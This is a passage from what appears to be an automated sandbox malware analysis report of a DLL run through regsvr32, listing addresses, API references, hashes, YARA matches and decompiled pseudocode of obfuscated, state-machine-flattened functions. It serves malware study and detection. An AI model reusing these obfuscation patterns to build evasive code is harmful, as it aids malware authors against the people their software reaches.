                                                                                                                0x10009485
                                                                                                                0x1000949f
                                                                                                                0x100094aa
                                                                                                                0x100094b6
                                                                                                                0x100094bc
                                                                                                                0x100094c4
                                                                                                                0x100094c9
                                                                                                                0x100094d6
                                                                                                                0x100094ed
                                                                                                                0x1000950f
                                                                                                                0x10009511
                                                                                                                0x10009579
                                                                                                                0x1000957c
                                                                                                                0x10009582
                                                                                                                0x10009589
                                                                                                                0x1000959d
                                                                                                                0x100095bb
                                                                                                                0x100095bd
                                                                                                                0x100095c4
                                                                                                                0x100095cd
                                                                                                                0x100095d4
                                                                                                                0x100095db
                                                                                                                0x100095de
                                                                                                                0x100095e1
                                                                                                                0x100095e4
                                                                                                                0x100095ea
                                                                                                                0x100095f0
                                                                                                                0x10009628
                                                                                                                0x1000962e
                                                                                                                0x10009634
                                                                                                                0x1000963a
                                                                                                                0x10009650
                                                                                                                0x10009658
                                                                                                                0x10009662
                                                                                                                0x10009671
                                                                                                                0x10009681
                                                                                                                0x1000969d
                                                                                                                0x100096a2
                                                                                                                0x100096a7
                                                                                                                0x10009b34
                                                                                                                0x10009b35
                                                                                                                0x10009b46
                                                                                                                0x100096ad
                                                                                                                0x100096bf
                                                                                                                0x100096cb
                                                                                                                0x100096d1
                                                                                                                0x100096e9
                                                                                                                0x100096fe
                                                                                                                0x10009719
                                                                                                                0x10009737
                                                                                                                0x1000973b
                                                                                                                0x10009741
                                                                                                                0x10009743
                                                                                                                0x10009756
                                                                                                                0x10009764
                                                                                                                0x10009777
                                                                                                                0x1000978b
                                                                                                                0x10009796
                                                                                                                0x1000979c
                                                                                                                0x100097a1
                                                                                                                0x100097a7
                                                                                                                0x100097c9
                                                                                                                0x100097f5
                                                                                                                0x10009823
                                                                                                                0x10009826
                                                                                                                0x10009828
                                                                                                                0x10009833
                                                                                                                0x1000983b
                                                                                                                0x10009860
                                                                                                                0x10009863
                                                                                                                0x10009869
                                                                                                                0x1000987a
                                                                                                                0x1000988a
                                                                                                                0x10009890
                                                                                                                0x10009896
                                                                                                                0x100098ae
                                                                                                                0x100098c3
                                                                                                                0x100098c8
                                                                                                                0x100098c9
                                                                                                                0x100098d6
                                                                                                                0x10009920
                                                                                                                0x10009921
                                                                                                                0x10009922
                                                                                                                0x10009927
                                                                                                                0x1000992c
                                                                                                                0x00000000
                                                                                                                0x10009932
                                                                                                                0x10009932
                                                                                                                0x10009938
                                                                                                                0x1000993d
                                                                                                                0x10009943
                                                                                                                0x10009949
                                                                                                                0x1000994d
                                                                                                                0x10009955
                                                                                                                0x10009971
                                                                                                                0x10009974
                                                                                                                0x10009978
                                                                                                                0x10009a3b
                                                                                                                0x1000997e
                                                                                                                0x1000997e
                                                                                                                0x10009981
                                                                                                                0x100099a0
                                                                                                                0x100099c2
                                                                                                                0x100099c3
                                                                                                                0x100099fb
                                                                                                                0x100099fc
                                                                                                                0x10009a01
                                                                                                                0x10009a07
                                                                                                                0x10009a24
                                                                                                                0x10009a2e
                                                                                                                0x10009a36
                                                                                                                0x10009a36
                                                                                                                0x10009a42
                                                                                                                0x10009a48
                                                                                                                0x10009a4e
                                                                                                                0x10009a54
                                                                                                                0x10009a7e
                                                                                                                0x10009a7f
                                                                                                                0x10009a84
                                                                                                                0x10009a89
                                                                                                                0x00000000
                                                                                                                0x10009a8f
                                                                                                                0x10009a8f
                                                                                                                0x10009a95
                                                                                                                0x10009a9b
                                                                                                                0x10009aa2
                                                                                                                0x10009aa6
                                                                                                                0x10009abb
                                                                                                                0x10009ac3
                                                                                                                0x10009ad6
                                                                                                                0x10009ad7
                                                                                                                0x10009adc
                                                                                                                0x10009ae1
                                                                                                                0x00000000
                                                                                                                0x10009ae3
                                                                                                                0x10009ae3
                                                                                                                0x10009ae9
                                                                                                                0x10009aef
                                                                                                                0x10009b03
                                                                                                                0x10009b09
                                                                                                                0x10009b28
                                                                                                                0x10009b2d
                                                                                                                0x10009b32
                                                                                                                0x10009b49
                                                                                                                0x10009b4e
                                                                                                                0x10009bc9
                                                                                                                0x10009bd9
                                                                                                                0x10009b50
                                                                                                                0x10009b54
                                                                                                                0x10009b5a
                                                                                                                0x10009b84

                                                                                                                APIs
                                                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 100091CE
                                                                                                                • GetProcessHeap.KERNEL32(00000008,-0000003F), ref: 100094AF
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,10009DAA), ref: 100094B6
                                                                                                                • memcpy.MSVCRT ref: 10009796
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocInfoNativeProcessSystemmemcpy
                                                                                                                • String ID: (
                                                                                                                • API String ID: 1755227880-3887548279
                                                                                                                • Opcode ID: ba75ff60e5f2714c780d4be58c1794a7b13bfb6c1ff3e390fb067a0a49a6c575
                                                                                                                • Instruction ID: 0db02a502ad7d83fd3fc5af0a51278123ea01100e51ef93ccf9851d7776962ba
                                                                                                                • Opcode Fuzzy Hash: ba75ff60e5f2714c780d4be58c1794a7b13bfb6c1ff3e390fb067a0a49a6c575
                                                                                                                • Instruction Fuzzy Hash: 97926932A0421B8FD718DF6CCED5D69B7A6FB94704F05822ADC058B3B5E6B4E915CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001A8844() {
                                                                                                                				char _v520;
                                                                                                                				signed int _v524;
                                                                                                                				signed int _v528;
                                                                                                                				signed int _v532;
                                                                                                                				signed int _v536;
                                                                                                                				signed int _v540;
                                                                                                                				signed int _v544;
                                                                                                                				signed int _v548;
                                                                                                                				signed int _v552;
                                                                                                                				signed int _v556;
                                                                                                                				signed int _v560;
                                                                                                                				signed int _v564;
                                                                                                                				signed int _v568;
                                                                                                                				signed int _v572;
                                                                                                                				unsigned int _v576;
                                                                                                                				signed int _v580;
                                                                                                                				signed int _v584;
                                                                                                                				signed int _v588;
                                                                                                                				signed int _v592;
                                                                                                                				signed int _v596;
                                                                                                                				signed int _v600;
                                                                                                                				signed int _v604;
                                                                                                                				signed int _v608;
                                                                                                                				signed int _v612;
                                                                                                                				signed int _v616;
                                                                                                                				signed int _v620;
                                                                                                                				signed int _v624;
                                                                                                                				intOrPtr _t245;
                                                                                                                				intOrPtr _t246;
                                                                                                                				signed int _t248;
                                                                                                                				void* _t249;
                                                                                                                				intOrPtr _t253;
                                                                                                                				signed int _t256;
                                                                                                                				intOrPtr _t257;
                                                                                                                				void* _t259;
                                                                                                                				intOrPtr _t269;
                                                                                                                				signed int _t289;
                                                                                                                				signed int _t290;
                                                                                                                				signed int _t291;
                                                                                                                				signed int _t292;
                                                                                                                				signed int _t293;
                                                                                                                				signed int _t294;
                                                                                                                				signed int _t295;
                                                                                                                				void* _t297;
                                                                                                                				signed int* _t299;
                                                                                                                				void* _t302;
                                                                                                                
                                                                                                                				_t299 =  &_v624;
                                                                                                                				_v616 = 0x27897;
                                                                                                                				_t259 = 0x3f7b64;
                                                                                                                				_v616 = _v616 * 0x1d;
                                                                                                                				_t297 = 0;
                                                                                                                				_v616 = _v616 >> 0xa;
                                                                                                                				_v616 = _v616 + 0x9ed7;
                                                                                                                				_v616 = _v616 ^ 0x0000b0dd;
                                                                                                                				_v592 = 0x1544e1;
                                                                                                                				_v592 = _v592 ^ 0x08454b80;
                                                                                                                				_v592 = _v592 << 0xf;
                                                                                                                				_v592 = _v592 ^ 0x07b08029;
                                                                                                                				_v540 = 0xdd6b68;
                                                                                                                				_t289 = 0x61;
                                                                                                                				_v540 = _v540 * 0x61;
                                                                                                                				_v540 = _v540 ^ 0x53eab257;
                                                                                                                				_v564 = 0xa2b647;
                                                                                                                				_v564 = _v564 + 0xab34;
                                                                                                                				_v564 = _v564 ^ 0x00a2d3be;
                                                                                                                				_v612 = 0xb49279;
                                                                                                                				_v612 = _v612 / _t289;
                                                                                                                				_t290 = 0xe;
                                                                                                                				_v612 = _v612 * 0x25;
                                                                                                                				_v612 = _v612 + 0xaeb2;
                                                                                                                				_v612 = _v612 ^ 0x004bef51;
                                                                                                                				_v576 = 0x67ecec;
                                                                                                                				_v576 = _v576 >> 8;
                                                                                                                				_v576 = _v576 ^ 0x000e8e6e;
                                                                                                                				_v584 = 0x19b5b7;
                                                                                                                				_v584 = _v584 | 0x66393fe5;
                                                                                                                				_t48 =  &_v584; // 0x66393fe5
                                                                                                                				_v584 =  *_t48 / _t290;
                                                                                                                				_v584 = _v584 ^ 0x074699c7;
                                                                                                                				_v528 = 0x9271a1;
                                                                                                                				_t291 = 0x34;
                                                                                                                				_v528 = _v528 * 0x73;
                                                                                                                				_v528 = _v528 ^ 0x41c91186;
                                                                                                                				_v556 = 0xbc268a;
                                                                                                                				_v556 = _v556 << 7;
                                                                                                                				_v556 = _v556 ^ 0x5e14820a;
                                                                                                                				_v604 = 0x3da2d4;
                                                                                                                				_v604 = _v604 + 0x1199;
                                                                                                                				_v604 = _v604 * 0x5c;
                                                                                                                				_v604 = _v604 ^ 0x16272749;
                                                                                                                				_v572 = 0x4dedcc;
                                                                                                                				_v572 = _v572 >> 0xf;
                                                                                                                				_v572 = _v572 ^ 0x0000b92d;
                                                                                                                				_v596 = 0x5cd635;
                                                                                                                				_v596 = _v596 / _t291;
                                                                                                                				_v596 = _v596 | 0x82bc2330;
                                                                                                                				_v596 = _v596 ^ 0x82bff634;
                                                                                                                				_v548 = 0xf9b637;
                                                                                                                				_v548 = _v548 + 0xffff2194;
                                                                                                                				_v548 = _v548 ^ 0x00fee79d;
                                                                                                                				_v620 = 0x80c27c;
                                                                                                                				_v620 = _v620 | 0xff7ff4fa;
                                                                                                                				_t292 = 0x44;
                                                                                                                				_v620 = _v620 / _t292;
                                                                                                                				_v620 = _v620 ^ 0x03c7a1d8;
                                                                                                                				_v608 = 0x850b30;
                                                                                                                				_v608 = _v608 << 0xa;
                                                                                                                				_v608 = _v608 + 0x5503;
                                                                                                                				_v608 = _v608 ^ 0x142577ae;
                                                                                                                				_v532 = 0x3be4d6;
                                                                                                                				_v532 = _v532 >> 7;
                                                                                                                				_v532 = _v532 ^ 0x00096fb3;
                                                                                                                				_v600 = 0xb1eb64;
                                                                                                                				_v600 = _v600 << 0xc;
                                                                                                                				_v600 = _v600 ^ 0x75f6948e;
                                                                                                                				_v600 = _v600 ^ 0x6b439af9;
                                                                                                                				_v624 = 0xb462c4;
                                                                                                                				_t293 = 0x27;
                                                                                                                				_v624 = _v624 * 0x28;
                                                                                                                				_v624 = _v624 / _t293;
                                                                                                                				_v624 = _v624 >> 4;
                                                                                                                				_v624 = _v624 ^ 0x000206b0;
                                                                                                                				_v560 = 0x298ba8;
                                                                                                                				_v560 = _v560 + 0x5167;
                                                                                                                				_v560 = _v560 ^ 0x002f83a2;
                                                                                                                				_v568 = 0x1db1fc;
                                                                                                                				_v568 = _v568 + 0x97b5;
                                                                                                                				_v568 = _v568 ^ 0x0016a8ad;
                                                                                                                				_v588 = 0x8218a;
                                                                                                                				_t294 = 6;
                                                                                                                				_v588 = _v588 * 0x7a;
                                                                                                                				_v588 = _v588 >> 7;
                                                                                                                				_v588 = _v588 ^ 0x0000bc59;
                                                                                                                				_v536 = 0x35ef93;
                                                                                                                				_v536 = _v536 >> 0xb;
                                                                                                                				_v536 = _v536 ^ 0x000d3c68;
                                                                                                                				_v580 = 0xba3b2f;
                                                                                                                				_v580 = _v580 ^ 0x2bb047f3;
                                                                                                                				_v580 = _v580 / _t294;
                                                                                                                				_v580 = _v580 ^ 0x0729b7a4;
                                                                                                                				_v544 = 0xbfe3f3;
                                                                                                                				_t295 = 0x1e;
                                                                                                                				_t296 = _v524;
                                                                                                                				_v544 = _v544 / _t295;
                                                                                                                				_v544 = _v544 ^ 0x00090887;
                                                                                                                				_v552 = 0x9ca452;
                                                                                                                				_v552 = _v552 + 0xb547;
                                                                                                                				_v552 = _v552 ^ 0x00934e46;
                                                                                                                				goto L1;
                                                                                                                				do {
                                                                                                                					while(1) {
                                                                                                                						L1:
                                                                                                                						_t302 = _t259 - 0xa3bf845;
                                                                                                                						if(_t302 > 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						if(_t302 == 0) {
                                                                                                                							_t259 = 0xa613c96;
                                                                                                                							_v524 = _v592;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t259 == 0x3f7b64) {
                                                                                                                							_push(_t259);
                                                                                                                							_t245 = E001A303A(_t259, 0x438);
                                                                                                                							_t299 =  &(_t299[3]);
                                                                                                                							 *0x1c4c10 = _t245;
                                                                                                                							_t259 = 0xfdec696;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t259 == 0x19bcfc7) {
                                                                                                                							_t246 =  *0x1c4c10; // 0x67d820
                                                                                                                							_t248 = E001A3466(_v524, _v620, _t259, _t259, _t246 + 4, _v608, _t259, _v532, _v600, _v624); // executed
                                                                                                                							_t299 =  &(_t299[8]);
                                                                                                                							_t259 = 0xfaba0ff;
                                                                                                                							__eflags = _t248;
                                                                                                                							_t249 = 1;
                                                                                                                							_t297 =  ==  ? _t249 : _t297;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t259 == 0x2e52b63) {
                                                                                                                							E001C0575(_v560, _v568, __eflags, _t259,  &_v520, _v588);
                                                                                                                							_t253 = E001AB9F6(_v536, _v580, _v544,  &_v520, _v552);
                                                                                                                							_t269 =  *0x1c4c10; // 0x67d820
                                                                                                                							 *((intOrPtr*)(_t269 + 0x428)) = _t253;
                                                                                                                							L22:
                                                                                                                							return _t297;
                                                                                                                						}
                                                                                                                						if(_t259 != 0x6fd0dd4) {
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						_t259 = 0x19bcfc7;
                                                                                                                						_v524 = _v616;
                                                                                                                					}
                                                                                                                					__eflags = _t259 - 0xa613c96;
                                                                                                                					if(_t259 == 0xa613c96) {
                                                                                                                						E001BED7B(_t296, _v572, _v596, _v548); // executed
                                                                                                                						_t259 = 0x19bcfc7;
                                                                                                                						goto L19;
                                                                                                                					}
                                                                                                                					__eflags = _t259 - 0xfaba0ff;
                                                                                                                					if(_t259 == 0xfaba0ff) {
                                                                                                                						E001A7761();
                                                                                                                						_t259 = 0x2e52b63;
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					__eflags = _t259 - 0xfdec696;
                                                                                                                					if(_t259 != 0xfdec696) {
                                                                                                                						goto L19;
                                                                                                                					}
                                                                                                                					_push(_t259);
                                                                                                                					_t256 = E001A6E01(_v528, _v556, _t259, _v604, _v540); // executed
                                                                                                                					_t296 = _t256;
                                                                                                                					_t299 =  &(_t299[4]);
                                                                                                                					__eflags = _t256;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_t259 = 0x6fd0dd4;
                                                                                                                					} else {
                                                                                                                						_t257 =  *0x1c4c10; // 0x67d820
                                                                                                                						 *((intOrPtr*)(_t257 + 0x414)) = 1;
                                                                                                                						_t259 = 0xa3bf845;
                                                                                                                					}
                                                                                                                					goto L1;
                                                                                                                					L19:
                                                                                                                					__eflags = _t259 - 0x262755a;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L22;
                                                                                                                 			}

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: QK$d{?$d{?$gQ$h<$?9f$g
                                                                                                                • API String ID: 0-2100959024
                                                                                                                • Opcode ID: ca7c65749704e20489eb5d2a5cb1230cfc15a2ef6326ac99f1bcdb2c4db13434
                                                                                                                • Instruction ID: f37ecd5528c25766d8b3cfcf602adac2d9183ec136ff4deb9fd6190366f5e75f
                                                                                                                • Opcode Fuzzy Hash: ca7c65749704e20489eb5d2a5cb1230cfc15a2ef6326ac99f1bcdb2c4db13434
                                                                                                                • Instruction Fuzzy Hash: 29C13FB5108380DFC358CF25D58A91BFBE1FBC4718F104A1DF6969A260DBB58988CF56
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                [Figure: control-flow graph of function 1c0e7a; legend: Executed / Not Executed]
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001C0E7A() {
                                                                                                                				char _v524;
                                                                                                                				intOrPtr _v548;
                                                                                                                				char _v564;
                                                                                                                				void* _v576;
                                                                                                                				intOrPtr _v580;
                                                                                                                				intOrPtr _v584;
                                                                                                                				char _v588;
                                                                                                                				signed int _v592;
                                                                                                                				signed int _v596;
                                                                                                                				signed int _v600;
                                                                                                                				signed int _v604;
                                                                                                                				signed int _v608;
                                                                                                                				signed int _v612;
                                                                                                                				signed int _v616;
                                                                                                                				signed int _v620;
                                                                                                                				signed int _v624;
                                                                                                                				signed int _v628;
                                                                                                                				signed int _v632;
                                                                                                                				signed int _v636;
                                                                                                                				signed int _v640;
                                                                                                                				signed int _v644;
                                                                                                                				signed int _v648;
                                                                                                                				signed int _v652;
                                                                                                                				signed int _v656;
                                                                                                                				signed int _v660;
                                                                                                                				signed int _v664;
                                                                                                                				signed int _v668;
                                                                                                                				signed int _v672;
                                                                                                                				signed int _v676;
                                                                                                                				signed int _v680;
                                                                                                                				signed int _t249;
                                                                                                                				void* _t251;
                                                                                                                				void* _t253;
                                                                                                                				signed int _t255;
                                                                                                                				void* _t257;
                                                                                                                				signed int _t259;
                                                                                                                				signed int _t260;
                                                                                                                				signed int _t261;
                                                                                                                				signed int _t262;
                                                                                                                				signed int _t263;
                                                                                                                				signed int _t264;
                                                                                                                				signed int _t284;
                                                                                                                				signed int _t287;
                                                                                                                				void* _t288;
                                                                                                                				void* _t290;
                                                                                                                				void* _t295;
                                                                                                                
                                                                                                                				_v580 = 0x4bfe6e;
                                                                                                                				asm("stosd");
                                                                                                                				_t257 = 0;
                                                                                                                				_t259 = 0x51;
                                                                                                                				asm("stosd");
                                                                                                                				_t288 = 0x7c0e6ed;
                                                                                                                				asm("stosd");
                                                                                                                				_v628 = 0x943dcb;
                                                                                                                				_v628 = _v628 / _t259;
                                                                                                                				_v628 = _v628 + 0xfffff572;
                                                                                                                				_v628 = _v628 ^ 0x0001c976;
                                                                                                                				_v652 = 0x585185;
                                                                                                                				_t260 = 0x52;
                                                                                                                				_v652 = _v652 / _t260;
                                                                                                                				_t261 = 0x7a;
                                                                                                                				_v652 = _v652 * 0x30;
                                                                                                                				_v652 = _v652 << 3;
                                                                                                                				_v652 = _v652 ^ 0x019d9581;
                                                                                                                				_v620 = 0x8e37d2;
                                                                                                                				_v620 = _v620 / _t261;
                                                                                                                				_t262 = 0xa;
                                                                                                                				_v620 = _v620 / _t262;
                                                                                                                				_v620 = _v620 ^ 0x00001dd4;
                                                                                                                				_v640 = 0xebfcbd;
                                                                                                                				_t263 = 0x37;
                                                                                                                				_v640 = _v640 / _t263;
                                                                                                                				_v640 = _v640 ^ 0x411fbc08;
                                                                                                                				_v640 = _v640 ^ 0x411a10cf;
                                                                                                                				_v660 = 0x4be58e;
                                                                                                                				_v660 = _v660 >> 0xb;
                                                                                                                				_v660 = _v660 + 0xffffb1c4;
                                                                                                                				_t264 = 6;
                                                                                                                				_v660 = _v660 / _t264;
                                                                                                                				_v660 = _v660 ^ 0x2aa1171b;
                                                                                                                				_v644 = 0xd2a2f8;
                                                                                                                				_v644 = _v644 << 4;
                                                                                                                				_v644 = _v644 << 0xa;
                                                                                                                				_v644 = _v644 ^ 0xa8b68ca4;
                                                                                                                				_v664 = 0x5a4bde;
                                                                                                                				_v664 = _v664 + 0xffffb5eb;
                                                                                                                				_v664 = _v664 + 0xe53f;
                                                                                                                				_v664 = _v664 + 0x5924;
                                                                                                                				_v664 = _v664 ^ 0x005ba612;
                                                                                                                				_v608 = 0x7d929e;
                                                                                                                				_v608 = _v608 << 3;
                                                                                                                				_v608 = _v608 ^ 0x03e48f26;
                                                                                                                				_v672 = 0x930377;
                                                                                                                				_v672 = _v672 * 0x7b;
                                                                                                                				_v672 = _v672 | 0x5ffbfbde;
                                                                                                                				_v672 = _v672 ^ 0x5ff4a673;
                                                                                                                				_v600 = 0xe93e8d;
                                                                                                                				_v600 = _v600 >> 6;
                                                                                                                				_v600 = _v600 ^ 0x00035072;
                                                                                                                				_v596 = 0x8bae1;
                                                                                                                				_v596 = _v596 + 0x651f;
                                                                                                                				_v596 = _v596 ^ 0x000c8a01;
                                                                                                                				_v680 = 0x4044e2;
                                                                                                                				_v680 = _v680 | 0x147b8f95;
                                                                                                                				_t265 = 0x2f;
                                                                                                                				_t287 = _v608;
                                                                                                                				_v680 = _v680 / _t265;
                                                                                                                				_v680 = _v680 ^ 0x0bafe04b;
                                                                                                                				_v680 = _v680 ^ 0x0bc26967;
                                                                                                                				_v668 = 0x26c565;
                                                                                                                				_v668 = _v668 << 9;
                                                                                                                				_v668 = _v668 + 0x3a75;
                                                                                                                				_v668 = _v668 | 0xf69dce84;
                                                                                                                				_v668 = _v668 ^ 0xff978a4f;
                                                                                                                				_v604 = 0xd2ae2f;
                                                                                                                				_v604 = _v604 + 0xc6b0;
                                                                                                                				_v604 = _v604 ^ 0x00d55143;
                                                                                                                				_v632 = 0xdd9fc6;
                                                                                                                				_v632 = _v632 >> 1;
                                                                                                                				_v632 = _v632 * 0x18;
                                                                                                                				_v632 = _v632 ^ 0x0a65bd45;
                                                                                                                				_v624 = 0x914ed;
                                                                                                                				_v624 = _v624 >> 0xa;
                                                                                                                				_v624 = _v624 + 0xe549;
                                                                                                                				_v624 = _v624 ^ 0x00003b1e;
                                                                                                                				_v676 = 0x2eb381;
                                                                                                                				_v676 = _v676 + 0x213e;
                                                                                                                				_v676 = _v676 >> 0xe;
                                                                                                                				_v676 = _v676 + 0xffffaa21;
                                                                                                                				_v676 = _v676 ^ 0xfff8482c;
                                                                                                                				_v616 = 0x2a8bc4;
                                                                                                                				_v616 = _v616 + 0xffff2eab;
                                                                                                                				_v616 = _v616 * 0x1d;
                                                                                                                				_v616 = _v616 ^ 0x04b3354b;
                                                                                                                				_v592 = 0xc6c06c;
                                                                                                                				_v592 = _v592 << 0xb;
                                                                                                                				_v592 = _v592 ^ 0x360c8b3f;
                                                                                                                				_v636 = 0x8b5b84;
                                                                                                                				_v636 = _v636 ^ 0xd3871808;
                                                                                                                				_v636 = _v636 | 0x4157d7c1;
                                                                                                                				_v636 = _v636 ^ 0xd35c8dff;
                                                                                                                				_v648 = 0xa7ae0f;
                                                                                                                				_v648 = _v648 + 0xffffb3c1;
                                                                                                                				_v648 = _v648 | 0x5fef3d7f;
                                                                                                                				_v648 = _v648 ^ 0x5fee6a41;
                                                                                                                				_v656 = 0xb088b2;
                                                                                                                				_v656 = _v656 ^ 0x94592e7b;
                                                                                                                				_v656 = _v656 | 0x9c735a00;
                                                                                                                				_v656 = _v656 << 0x10;
                                                                                                                				_v656 = _v656 ^ 0xfec44322;
                                                                                                                				_v612 = 0xcc869e;
                                                                                                                				_v612 = _v612 + 0x2431;
                                                                                                                				_v612 = _v612 >> 9;
                                                                                                                				_v612 = _v612 ^ 0x0007bc38;
                                                                                                                				do {
                                                                                                                					while(_t288 != 0xa972cf) {
                                                                                                                						if(_t288 == 0xb1903e) {
                                                                                                                							_t284 = _v664;
                                                                                                                							_t249 = E001BA50A(_t284, _v620, _v608, _v672, _t257, _v600, _v596, _v628, _t265, _v680, _v652, _v668,  &_v524); // executed
                                                                                                                							_t287 = _t249;
                                                                                                                							_t295 = _t295 + 0x30;
                                                                                                                							__eflags = _t287 - 0xffffffff;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								L20:
                                                                                                                								return _t257;
                                                                                                                							}
                                                                                                                							_t288 = 0xe5e92a7;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t288 == 0x4e98f9f) {
                                                                                                                							_t251 = E001A2221(_t265);
                                                                                                                							_t290 = _v588 - _v548;
                                                                                                                							asm("sbb ecx, [esp+0x9c]");
                                                                                                                							__eflags = _v584 - _t284;
                                                                                                                							if(__eflags < 0) {
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                							if(__eflags > 0) {
                                                                                                                								L19:
                                                                                                                								_t257 = 1;
                                                                                                                								__eflags = 1;
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                							__eflags = _t290 - _t251;
                                                                                                                							if(_t290 < _t251) {
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						if(_t288 == 0x7c0e6ed) {
                                                                                                                							_t288 = 0xaab6d15;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t288 == 0xaab6d15) {
                                                                                                                							_t284 = _v660;
                                                                                                                							_t265 = _v640;
                                                                                                                							_t253 = E001C0575(_v640, _t284, __eflags, _v640,  &_v524, _v644);
                                                                                                                							_t295 = _t295 + 0xc;
                                                                                                                							__eflags = _t253;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                							_t288 = 0xb1903e;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t288 == 0xe5e92a7) {
                                                                                                                							_t255 = E001B91CC(_t287, _v604, _t265, _v632, _v624,  &_v564, _t265, _v676);
                                                                                                                							_t265 = _t287;
                                                                                                                							_t284 = _v616;
                                                                                                                							asm("sbb esi, esi");
                                                                                                                							_t288 = ( ~_t255 & 0xf11d3c16) + 0xf8c36b9; // executed
                                                                                                                							E001B02D8(_t287, _t284, _v592, _v636); // executed
                                                                                                                							_t295 = _t295 + 0x20;
                                                                                                                						}
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					_t222 =  &_v656; // 0x5fee6a41
                                                                                                                					_t284 =  *_t222;
                                                                                                                					E001C2545(_v648, _t284, _v612,  &_v588);
                                                                                                                					_pop(_t265);
                                                                                                                					_t288 = 0x4e98f9f;
                                                                                                                					L14:
                                                                                                                				} while (_t288 != 0xf8c36b9);
                                                                                                                				goto L20;
                                                                                                                			}

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $Y$1$$>!$Aj_$I$u:$D@
                                                                                                                • API String ID: 0-228290010
                                                                                                                • Opcode ID: 4bac98933db578142025bd5de0b79407f17bba23569f3914af7c11532390db40
                                                                                                                • Instruction ID: a93f49f6b139ff50844830b3aa504acf3f753ec6fe5f17f53d692ac93af5b969
                                                                                                                • Opcode Fuzzy Hash: 4bac98933db578142025bd5de0b79407f17bba23569f3914af7c11532390db40
                                                                                                                • Instruction Fuzzy Hash: 58B160B28083809FD368CF65C98A95BFBE2BBD5718F108A1CF59596260D3B5C9098F43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 553 1bfecb-1c0394 call 1ac98a 556 1c039c-1c039e 553->556 557 1c03a4-1c03aa 556->557 558 1c0521-1c0547 call 1b4e54 556->558 560 1c048b-1c051c call 1bf5d9 call 1c224c call 1bf94b 557->560 561 1c03b0-1c03b6 557->561 562 1c054c-1c0557 558->562 582 1c0484-1c0486 560->582 564 1c03b8-1c03be 561->564 565 1c03f6-1c0481 call 1bf5d9 call 1ad467 call 1bf94b 561->565 567 1c055c-1c0562 562->567 564->567 569 1c03c4-1c03f4 call 1a3466 564->569 565->582 567->556 571 1c0568-1c0574 567->571 569->556 582->556
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001BFECB(void* __ecx, intOrPtr _a4) {
                                                                                                                				char _v520;
                                                                                                                				char _v1040;
                                                                                                                				intOrPtr _v1044;
                                                                                                                				intOrPtr _v1048;
                                                                                                                				intOrPtr _v1052;
                                                                                                                				intOrPtr _v1056;
                                                                                                                				signed int _v1060;
                                                                                                                				signed int _v1064;
                                                                                                                				signed int _v1068;
                                                                                                                				signed int _v1072;
                                                                                                                				signed int _v1076;
                                                                                                                				signed int _v1080;
                                                                                                                				signed int _v1084;
                                                                                                                				signed int _v1088;
                                                                                                                				signed int _v1092;
